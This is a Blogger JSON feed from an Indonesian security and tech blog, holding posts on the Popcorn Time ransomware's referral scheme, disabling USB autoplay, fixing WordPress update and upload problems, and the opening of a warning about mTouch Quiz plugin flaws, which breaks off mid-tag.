gdata.io.handleScriptLoaded({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$georss":"http://www.georss.org/georss","xmlns$thr":"http://purl.org/syndication/thread/1.0","xmlns$blogger":"http://schemas.google.com/blogger/2008","id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043"},"updated":{"$t":"2023-11-11T06:59:51.668+07:00"},"category":[{"term":"antivirus"},{"term":"cyber security"},{"term":"Graphic Design"},{"term":"Video"},{"term":"Server"},{"term":"Webserver"},{"term":"tools"},{"term":"Title"},{"term":"uuite"},{"term":"malware"},{"term":"chrome"},{"term":"Sports"},{"term":"Acara Nasional"},{"term":"networking"},{"term":"wireless"},{"term":"ubnt"},{"term":"vulnerabilities"},{"term":"Database"},{"term":"Kali Linux"},{"term":"blogger"},{"term":"facebook"},{"term":"ubuntu"},{"term":"Internet"},{"term":"Fashion"},{"term":"Game"},{"term":"instragram"},{"term":"People"},{"term":"instagram"},{"term":"Test"},{"term":"berita"},{"term":"internet sehat"},{"term":"app"},{"term":"whatsapp"},{"term":"windows"},{"term":"python"},{"term":"google"},{"term":"Url Short"},{"term":"Tekno"},{"term":"Motion Design"},{"term":"Music"},{"term":"download"},{"term":"virus"},{"term":"wordpress"},{"term":"airfiber"},{"term":"programing"},{"term":"Tutorial"},{"term":"humas aceh"},{"term":"ubiquiti"},{"term":"Domain"},{"term":"Event"},{"term":"Google Maps"},{"term":"jaringan"},{"term":"Movies"},{"term":"Print Design"},{"term":"fedora"},{"term":"Web Design"},{"term":"programer"},{"term":"network"},{"term":"WebSecurity"},{"term":"Aceh"},{"term":"cloud"},{"term":"Technology"},{"term":"powerbeam"},{"term":"seo"},{"term":"security"},{"term":"Short"},{"term":"linux"},{"term":"Triks"},{"term":"mysql"},{"term":"nmap"},{"term":"pemula"},{"term":"learn"},{"term":"proxmox"},{"term":"Komunitas"},{"term":"acehprov"},{"term":"Online Tools"},{"term":"games"},{"term":"wine"},{"term":"materi"},{"term":"android"},{"term":"data"},{"term":"City"},{"term":"debian"},{"term":"webprograming"},{"term":"Foods"},{"term":"Update"},{"term":"Unik"},{"term":"ddos"},{"term":"Entertainment"},{"term":"diretas"},{"term":"software"},{"term":"winbox"},{"term":"smartphones"},{"term":"distro"},{"term":"Artikel"}],"title":{"type":"text","$t":"#KomunitasBungker"},"subtitle":{"type":"html","$t":"BUNGKER"},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/-/vulnerabilities?alt\u003djson-in-script\u0026max-results\u003d50"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/-/vulnerabilities?alt\u003djson-in-script\u0026max-results\u003d50"},{"rel":"alternate","type":"text/html","href":"http://www.bungker.co.id/search/label/vulnerabilities"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"generator":{"version":"7.00","uri":"https://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"7"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"50"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-5402280533936558244"},"published":{"$t":"2016-12-17T22:44:00.000+07:00"},"updated":{"$t":"2016-12-17T22:44:40.414+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"},{"scheme":"http://www.blogger.com/atom/ns#","term":"internet sehat"},{"scheme":"http://www.blogger.com/atom/ns#","term":"malware"}],"title":{"type":"text","$t":"Virus Ransomware Baru Mengambil Skema Kerja Penyebaran seperti MLM"},"content":{"type":"html","$t":"\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\n\u003ca href\u003d\"https://1.bp.blogspot.com/-DqDcaIj5L3I/WFVdITCUjAI/AAAAAAAABc4/Wyb74Vt8rqEdge28dRaCUVfXK16VJYuJQCLcB/s1600/R_consumer4.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"356\" src\u003d\"https://1.bp.blogspot.com/-DqDcaIj5L3I/WFVdITCUjAI/AAAAAAAABc4/Wyb74Vt8rqEdge28dRaCUVfXK16VJYuJQCLcB/s640/R_consumer4.png\" width\u003d\"640\" /\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\n\u003cbr /\u003e\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\n\u003cbr /\u003e\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\nSebuah varian baru dari ransomware telah ditemukan menggunakan sistem\n inovatif untuk meningkatkan infeksi serangan mereka, yaitu dengan \nmenjadikan korbannya\u0026nbsp;penyerang baru dan\u0026nbsp;menawarkan diskon skema \npiramida. Setiap pengguna yang menemukan diri mereka terinfeksi oleh \nmalware Popcorn Time ditawarkan kemampuan untuk membuka file yang telah \ndienkripsi oleh malware tersebut dengan pembayaran tunai, biasanya satu \nbitcoin 772,67\u0026nbsp;dollar AS. Namun hak tersebut bukan satu-satunya tawaran.\n Terdapat opsi kedua,\u0026nbsp;yaitu menyebarkan malware tersebut. Jika dua orang\n atau lebih menginstal file malware dan membayar, mereka akan \nmendekripsi file korban\u0026nbsp;secara gratis. Hal ini tentu sangat berbahaya, \ndi mana korban bisa terdorong menjadi penyerang baru karena mereka tidak\n perlu repot untuk membayar, cukup menyebarkan link malware.\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\nSkema pemasaran afiliasi ini ditemukan oleh peneliti keamanan \nMalwareHunterTeam. Untuk saat ini,\u0026nbsp;skema ini masih dalam tahap \npengembangan, tetapi jika software tersebut sudah dirilis penuh, metode \ndistribusi yang inovatif\u0026nbsp;ini dapat menyebabkan malware Popcorn Time \nmenjadi salah satu varian yang lebih luas dari jenis malware lainnya.\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\nSeperti kebanyakan ransomware, Popcorn Time\u0026nbsp;mengenkripsi file penting\n korban di\u0026nbsp;hard drive yang terinfeksi dan menjanjikan kunci dekripsi \nhanya untuk para pengguna yang membayar (atau menginfeksi orang lain). \nAkan tetapi, kode dari malware tersebut juga menunjukkan\u0026nbsp;kemungkinan \nkedua, yaitu ransomware dapat menghapus kunci enkripsi sepenuhnya jika \nkode salah dimasukkan sebanyak empat kali.\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\nSebagian besar organisasi penegak hukum merekomendasikan korban untuk\n tidak melakukan pembayaran atau membayar uang tebusan jika terkena \nserangan ransomware. Hal ini karena dana tebusan tersebut bisa digunakan\n untuk kegiatan kriminal lanjutan dan bahwa tidak ada jaminan file akan \npulih. Banyak peneliti keamanan merekomendasikan hal yang sama. Ini \nartinya, jika Anda menjadi salah satu korban serangan ransomware, Anda \nlebih baik mengikhlaskan data yang dikunci oleh penyerang di hard disk \ndaripada membayar uang tebusan.\u003c/div\u003e\n\u003cdiv style\u003d\"text-align: justify;\"\u003e\n\u003cstrong\u003eSumber:\u003c/strong\u003e The Guardian\u003c/div\u003e\n\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/5402280533936558244/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2016/12/virus-ransomware-baru-mengambil-skema.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/5402280533936558244"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/5402280533936558244"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2016/12/virus-ransomware-baru-mengambil-skema.html","title":"Virus Ransomware Baru Mengambil Skema Kerja Penyebaran seperti MLM"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https://1.bp.blogspot.com/-DqDcaIj5L3I/WFVdITCUjAI/AAAAAAAABc4/Wyb74Vt8rqEdge28dRaCUVfXK16VJYuJQCLcB/s72-c/R_consumer4.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-5027585482478714522"},"published":{"$t":"2015-12-24T20:09:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.411+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"security"},{"scheme":"http://www.blogger.com/atom/ns#","term":"virus"},{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Technology"},{"scheme":"http://www.blogger.com/atom/ns#","term":"cyber security"}],"title":{"type":"text","$t":"Cara mematikan autoplay pada USB Flashdisk"},"content":{"type":"html","$t":"\u003cbr /\u003eJumpa lagi dengan saya, kali ini saya akan mempostingkan sedikit banyak tutorial karena saya ingin meluangkan waktu saya pada blog saya yang sungguh sangat gila ini. Pada postingan kali ini saya akan membahas hanya sedikit dan tidak terlalu banyak, yaitu bagaimana cara mematikan autoplay pada USB Flashdisk. Daripada terlalu banyak berbicara, lebih baik banyak aksi.\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://2.bp.blogspot.com/-jKX8eow5z7I/VnvtqNfyjdI/AAAAAAAAA7k/tQbGNPUzwG8/s1600/ShellrunVistaAutoPlay.png\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"346\" src\u003d\"http://2.bp.blogspot.com/-jKX8eow5z7I/VnvtqNfyjdI/AAAAAAAAA7k/tQbGNPUzwG8/s400/ShellrunVistaAutoPlay.png\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cbr /\u003ePertama sekali, masukkan USB Flashdisk anda pada laptop atau PC anda, kemudian akan muncul autoplaynya seperti gambar dibawah ini.\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://3.bp.blogspot.com/-lYyjEfweNr4/VnvtxdVNVPI/AAAAAAAAA74/oP7OGbj1wNA/s1600/1.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"223\" src\u003d\"http://3.bp.blogspot.com/-lYyjEfweNr4/VnvtxdVNVPI/AAAAAAAAA74/oP7OGbj1wNA/s400/1.jpg\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003c/div\u003eKemudian, dijendela paling bawah terdapat tulisan \"\u003cb\u003eView more AutoPlay options in Control Panel\u003c/b\u003e\", klik bagian tersebut! kemudian akan mulcul jendela baru seperti gambar dibawah ini.\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://1.bp.blogspot.com/-BHhsp3FqwxM/Vnvtw36Ih4I/AAAAAAAAA70/Iit2b2A9EWw/s1600/2.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg border\u003d\"0\" height\u003d\"133\" src\u003d\"http://1.bp.blogspot.com/-BHhsp3FqwxM/Vnvtw36Ih4I/AAAAAAAAA70/Iit2b2A9EWw/s400/2.jpg\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cbr /\u003eLalu, langkah selanjutnya yaitu hilangkan tanda contengan pada tulisan \"\u003cb\u003eUse AutoPlay for all media and devices\u003c/b\u003e\" seperti gambar diatas, kemudian langkah terakhir, klik \"\u003cb\u003eSave\u003c/b\u003e\" pada sudut kanan bawah, Selesai.\u003cbr /\u003e\u003cbr /\u003e\u003cb\u003eReferensi : \u003ca href\u003d\"http://www.ahan-ganteng.com/2015/12/how-to-turn-off-autoplay-on-your-usb.html\"\u003eBlog-Ahan\u003c/a\u003e\u003c/b\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/5027585482478714522/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/cara-mematikan-autoplay-pada-usb.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/5027585482478714522"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/5027585482478714522"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/cara-mematikan-autoplay-pada-usb.html","title":"Cara mematikan autoplay pada USB Flashdisk"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://2.bp.blogspot.com/-jKX8eow5z7I/VnvtqNfyjdI/AAAAAAAAA7k/tQbGNPUzwG8/s72-c/ShellrunVistaAutoPlay.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-4765859349503394092"},"published":{"$t":"2015-12-23T03:29:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.493+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"Server"},{"scheme":"http://www.blogger.com/atom/ns#","term":"security"},{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"},{"scheme":"http://www.blogger.com/atom/ns#","term":"learn"},{"scheme":"http://www.blogger.com/atom/ns#","term":"cyber security"}],"title":{"type":"text","$t":"Hal yang paling sering terjadi pada wordpress dan cara mengatasinya"},"content":{"type":"html","$t":"\u003ch3 class\u003d\"post-title entry-title\" itemprop\u003d\"name\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 18px; font-stretch: normal; margin: 0px; position: relative;\"\u003e\u003cb style\u003d\"background-color: transparent; font-size: 14.85px; line-height: 20.79px;\"\u003eHal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\u003c/b\u003e\u003c/h3\u003e\u003cdiv class\u003d\"post-body entry-content\" id\u003d\"post-body-6239947359301766202\" itemprop\u003d\"description articleBody\" style\u003d\"position: relative; width: 578px;\"\u003e\u003cdiv class\u003d\"postdatefull\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4;\"\u003e\u003cdiv class\u003d\"postdate\" style\u003d\"width: 578px;\"\u003e\u003cu\u003e\u003c/u\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cb\u003eCara update wordpress secara manual\u003c/b\u003e - Ada dua cara update wordpress, cara yang pertama secara otomatis yaitu hanya dengan meng-klik tombol update pada mesin wordpress, maka proses updating wordpress akan berjalan tetpi cara ini terkadang mendapat kendala baik yang disebabkan oleh server ataupun oleh jaringan internet yang tidak stabil sehingga proses update secara otomatis cenderung gagal, nah, sebagai alterntif kita menggunakan cara kedua yaitu update wordpress secara manual melalui cpanel, berikut langkah-langkahnya:\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cb\u003eLangkah pertama update wordpress manual \u003c/b\u003e\u003cbr /\u003e\u003cbr /\u003eLangkah pertama cara update wordpress manual adalah backup dahulu data anda melalui cpanel khawatir ada kekeliruan dalam proses update wordpress secara manual ini, kemudian silahkan download file wordpress terbarunya di www.wordpress.org/download, setelah file wordpress berhasil di download kemudian ekstrak file tersebut kemudian hapus folder wp-content nya selanjutnya compress kembali ke file zip dan simpan.\u003cbr /\u003e\u003cbr /\u003e\u003cb\u003eLangkah kedua update wordpress manual \u003c/b\u003e\u003cbr /\u003e\u003cbr /\u003eLangkah selanjutnya cara update wordpress manual adalah silahkan masuk ke cpanel hosting anda, kemudian pilih file manager selanjutnya pilih  public (masuk ke folder subdomain jika wordpress anda adalah subdomain), Hapus folder dan file wordpress anda pada pada cpanel seperti index.php, wp-atom.php dll, kecuali wp-content dan wp-config jangan dihapus seperti tampilan berikut ini.\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003cimg alt\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" border\u003d\"0\" height\u003d\"162\" src\u003d\"http://3.bp.blogspot.com/-Qjxc3-sybVk/UEK1MjR8sGI/AAAAAAAAAbQ/7lNNfBXU_so/s400/update+wordpress+manual+1.jpg\" title\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" width\u003d\"400\" /\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003c/div\u003e\u003cb\u003eLangkah ketiga update wordpress manual  \u003c/b\u003e\u003cbr /\u003e\u003cbr /\u003eLangkah terakhir cara update wordpress manual yaitu dengan upload file hasil download wordpress (file format zip) baru kita yang sudah kita modifikasi sebelumnya (tanpa file wp-content), dengan cara klik tombol upload pada cpanel, tunggu beberapa menit hingga proses upload selesai, setelah proses upload selesai silahkan ekstrak file hasil upload tersebut dengan cara klik kanan kemudian ekstrak.\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4;\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003cimg alt\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" border\u003d\"0\" height\u003d\"266\" src\u003d\"http://2.bp.blogspot.com/-VLmr3UavWrQ/UEK2rdMQidI/AAAAAAAAAbY/f3xAryeicC0/s400/update+manual+wordpress.jpg\" title\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" width\u003d\"400\" /\u003e\u0026nbsp;\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003c/div\u003eSetelah proses ekstrak selesai silahkan coba akses wordpess anda karena proses update wordpress secara manual sudah selesai.\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; text-align: justify;\"\u003e\u003cspan style\u003d\"color: #333333; font-family: \u0026quot;arial\u0026quot; , \u0026quot;tahoma\u0026quot; , \u0026quot;helvetica\u0026quot; , \u0026quot;freesans\u0026quot; , sans-serif;\"\u003e\u003cspan style\u003d\"font-size: 14.8500003814697px; line-height: 20.7900009155273px;\"\u003e\u003ci\u003eHal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\u003c/i\u003e\u003c/span\u003e\u003c/span\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: justify;\"\u003e\u003cb style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4;\"\u003eCara mengatasi wordpress tidak bisa upload gambar\u003c/b\u003e\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cdiv class\u003d\"fullpost\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: justify;\"\u003e\u003cb\u003eCara mengatasi wordpress tidak bisa upload gambar\u003c/b\u003e\u0026nbsp;- Beberapa waktu lalu saya mengalami kendala dalam mesin wordpress saya ketika update posting saya tidak bisa meng-upload gambar kurang lebih pesannya seperti ini:\u003c/div\u003e\u003cblockquote class\u003d\"tr_bq\"\u003e\"Unable to create directory /home/webkamu/public_html/wp-content/uploads/2012/04. Is its parent directory writable by the server?\"\u003c/blockquote\u003e\u003cdiv class\u003d\"fullpost\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: justify;\"\u003ekendala ini saya dapat ketika baru melakukan pindah hosting wordpress saya, tapi alhamdulilah setelah googling sana sini ahirnya solusi mengatasi wordpress tidak bisa upload gambar bisa terselesaikan.\u003c/div\u003e\u003cdiv class\u003d\"fullpost\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: justify;\"\u003e\u003cbr /\u003e\u003c/div\u003e\u003cdiv class\u003d\"fullpost\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: justify;\"\u003e\u003c/div\u003ePenyebab utama munculnya pesan error diatas adalah karena wordpress tidak dapat mengupload gambar pada tempat yang ditentukan. Error ini sering terjadi pada wordpress yang baru berpindah hosting, dan lupa melakukan konfigurasi pada wordpressnya.\u003cbr /\u003e\u003cbr /\u003eNah, untuk mempersingkat waktu langsung saja kita ke masalah tersebut yaitu dengan cara silahkan masuk ke login wordpress anda kemudian klik setting dan selanjutnyaMedia dan pada bagian uploading files rubahlah isi file Store uploads in this folderdengan wp-content/uploads, kemudian simpan dengan klik save change. sebagaimana tampilan berikut :\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cbr /\u003e\u003cdiv class\u003d\"fullpost\" style\u003d\"background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4;\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"separator\" style\u003d\"background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.8500003814697px; line-height: 1.4; text-align: center;\"\u003e\u003ca href\u003d\"http://4.bp.blogspot.com/-02zEMg4aOhc/T5uEbVqCVqI/AAAAAAAAAZI/pUCRCUELFFI/s1600/tidak+bisa+upload+gambar.jpg\" style\u003d\"color: #6699cc; margin-left: 1em; margin-right: 1em; text-decoration: none;\"\u003e\u003cimg alt\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" border\u003d\"0\" height\u003d\"157\" src\u003d\"http://4.bp.blogspot.com/-02zEMg4aOhc/T5uEbVqCVqI/AAAAAAAAAZI/pUCRCUELFFI/s400/tidak+bisa+upload+gambar.jpg\" style\u003d\"border: none; position: relative;\" title\u003d\"Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\" width\u003d\"400\" /\u003e\u003c/a\u003e\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cbr /\u003e\u003c/div\u003eSetelah langkah-langkah Cara mengatasi wordpress tidak bisa upload gambar di atas sudah selesai silahkan refresh halaman postingan anda kemudian upload ulang gambar anda.\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003e\u003cu\u003eNah itu dia\u0026nbsp;Hal Yang Paling Sering Terjadi Pada Wordpress dan Cara Mengatasinya\u003c/u\u003e.\u003c/div\u003e\u003cdiv dir\u003d\"ltr\"\u003eSemoga Bermanfaat..\u003cbr /\u003e\u003cbr /\u003e\u003ci\u003eReferensi: \u003ca href\u003d\"https://www.teukuraja.net/2015/06/hal-yang-paling-sering-terjadi-pada.html\" target\u003d\"_blank\"\u003eTeuku Raja Blog\u003c/a\u003e\u003c/i\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv class\u003d\"blogger-post-footer\"\u003ehttp://feeds.feedburner.com/co/mFdp\u003c/div\u003e"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https://www.bungker.co.id/feeds/4765859349503394092/comments/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https://www.bungker.co.id/2015/12/hal-yang-paling-sering-terjadi-pada.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/4765859349503394092"},{"rel":"self","type":"application/atom+xml","href":"https://www.blogger.com/feeds/4562681011204589043/posts/default/4765859349503394092"},{"rel":"alternate","type":"text/html","href":"https://www.bungker.co.id/2015/12/hal-yang-paling-sering-terjadi-pada.html","title":"Hal yang paling sering terjadi pada wordpress dan cara mengatasinya"}],"author":[{"name":{"$t":"Bungker Corp"},"uri":{"$t":"https://www.blogger.com/profile/14576039512366647631"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"35","height":"35","src":"//www.blogger.com/img/blogger_logo_round_35.png"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-Qjxc3-sybVk/UEK1MjR8sGI/AAAAAAAAAbQ/7lNNfBXU_so/s72-c/update+wordpress+manual+1.jpg","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-4562681011204589043.post-8902529214724515730"},"published":{"$t":"2015-12-23T03:15:00.000+07:00"},"updated":{"$t":"2016-01-16T18:47:59.540+07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"vulnerabilities"}],"title":{"type":"text","$t":"Perhatikan Beberapa Celah di Plugin mTouch Quiz v3.1.2 WordPress!"},"content":{"type":"html","$t":"Apa itu mTouch Quiz ?, mTouch Quiz adalah Sebuah Plugins Wordpress yang memungkinkan anda menambahkan kuis ke situs anda.\u003cbr /\u003etapi tahukah anda, banyak yang bilang tak ada keamanan sistem yang sempurna, karena yang menciptakan keamanan sistem adalah manusia yang jauh dari kata sempurna. Begitu Juga dengan plugins yang satu ini yang memiliki beberapa celah.\u003cbr /\u003e\u003cbr /\u003e\u003cdiv class\u003d\"separator\" style\u003d\"clear: both; text-align: center;\"\u003e\u003ca href\u003d\"http://1.bp.blogspot.com/-ASm2oVbP1x8/VnmrKuSdEiI/AAAAAAAAAqQ/_DbBLHh4VVs/s1600/mtouch-quiz-xss-1024x451.jpg\" imageanchor\u003d\"1\" style\u003d\"margin-left: 1em; margin-right: 1em;\"\u003e\u003cimg alt\u003d\"XSS Vuln WP mTouch\" border\u003d\"0\" height\u003d\"281\" 